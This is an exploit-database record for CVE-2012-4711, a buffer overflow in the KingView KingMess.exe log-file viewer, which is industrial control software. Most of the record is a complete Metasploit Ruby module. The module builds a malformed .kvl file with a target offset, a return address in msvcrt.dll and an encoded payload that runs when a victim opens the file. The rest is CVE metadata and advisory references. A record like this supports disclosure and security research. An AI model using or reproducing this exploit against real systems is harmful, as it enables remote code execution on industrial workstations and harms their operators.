ID
VAR-E-201302-0128
CVE
| cve_id: | CVE-2012-4711 | Trust: 3.0 |
EDB ID
24887
TITLE
KingView - Log File Parsing Buffer Overflow (Metasploit) - Windows remote Exploit
Trust: 0.6
DESCRIPTION
KingView - Log File Parsing Buffer Overflow (Metasploit). CVE-2012-4711CVE-89690 . remote exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | kingview | model: | - | scope: | - | version: | - | Trust: 1.0 |
| vendor: | kingview | model: | log file parsing | scope: | - | version: | - | Trust: 0.5 |
| vendor: | wellintech | model: | kingview | scope: | eq | version: | 6.53 | Trust: 0.3 |
EXPLOIT
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info={})
super(update_info(info,
'Name' => "KingView Log File Parsing Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found in KingView <= 6.55. It exists in
the KingMess.exe application when handling log files, due to the insecure usage of
sprintf. This module uses a malformed .kvl file which must be opened by the victim
via the KingMess.exe application, through the 'Browse Log Files' option. The module
has been tested successfully on KingView 6.52 and KingView 6.53 Free Trial over
Windows XP SP3.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Lucas Apa', # Vulnerability discovery
'Carlos Mario Penagos Hollman', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2012-4711'],
['OSVDB', '89690'],
['BID', '57909'],
['URL', 'http://ics-cert.us-cert.gov/pdf/ICSA-13-043-02.pdf']
],
'Payload' =>
{
'Space' => 1408,
'DisableNops' => true,
'BadChars' => "\x00\x0a\x0d",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Platform' => 'win',
'Targets' =>
[
[ 'KingView 6.52 English / KingView 6.53 Free Trial / Kingmess.exe 65.20.2003.10300 / Windows XP SP3',
{
'Offset' => 295,
'Ret' => 0x77c35459 # push esp # ret # msvcrt.dll
}
]
],
'Privileged' => false,
'DisclosureDate' => "Nov 20 2012",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'The filename', 'msf.kvl'])
], self.class)
end
def exploit
version = "6.00"
version << "\x00" * (0x90 - version.length)
entry = "\xdd\x07\x03\x00\x03\x00\x0d\x00\x0c\x00\x31\x00\x38\x00\xd4\x01"
entry << rand_text_alpha(target['Offset'])
entry << [target.ret].pack("V")
entry << rand_text_alpha(16)
entry << payload.encoded
kvl_file = version
kvl_file << entry
file_create(kvl_file)
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Log File Parsing Buffer Overflow (Metasploit)
Trust: 1.0
TAGS
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
| tag: | exploit | Trust: 0.5 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
| db: | ICS CERT | id: | ICSA-13-043-02 | Trust: 3.0 |
| db: | NVD | id: | CVE-2012-4711 | Trust: 3.0 |
| db: | EXPLOIT-DB | id: | 24887 | Trust: 1.6 |
| db: | 0DAYTODAY | id: | 20557 | Trust: 0.6 |
| db: | EDBNET | id: | 20428 | Trust: 0.6 |
| db: | EDBNET | id: | 46953 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 120919 | Trust: 0.5 |
| db: | ICS CERT | id: | ICSA-13-043-02A | Trust: 0.3 |
| db: | BID | id: | 57909 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2012-4711 | Trust: 2.7 |
| url: | https://0day.today/exploits/20557 | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/24887/ | Trust: 0.6 |
| url: | http://ics-cert.us-cert.gov/pdf/icsa-13-043-02.pdf | Trust: 0.3 |
| url: | http://www.kingview.com/ | Trust: 0.3 |
| url: | http://www.wellintech.com/ | Trust: 0.3 |
| url: | http://www.kingview.com/download/display1.aspx?id=225 | Trust: 0.3 |
| url: | http://ics-cert.us-cert.gov/pdf/icsa-13-043-02a-b.pdf | Trust: 0.3 |
SOURCES
| db: | BID | id: | 57909 |
| db: | PACKETSTORM | id: | 120919 |
| db: | EXPLOIT-DB | id: | 24887 |
| db: | EDBNET | id: | 20428 |
| db: | EDBNET | id: | 46953 |
LAST UPDATE DATE
2022-07-27T09:49:51.669000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 57909 | date: | 2013-04-02T15:37:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 57909 | date: | 2013-02-12T00:00:00 |
| db: | PACKETSTORM | id: | 120919 | date: | 2013-03-23T04:51:55 |
| db: | EXPLOIT-DB | id: | 24887 | date: | 2013-03-25T00:00:00 |
| db: | EDBNET | id: | 20428 | date: | 2013-03-23T00:00:00 |
| db: | EDBNET | id: | 46953 | date: | 2013-03-25T00:00:00 |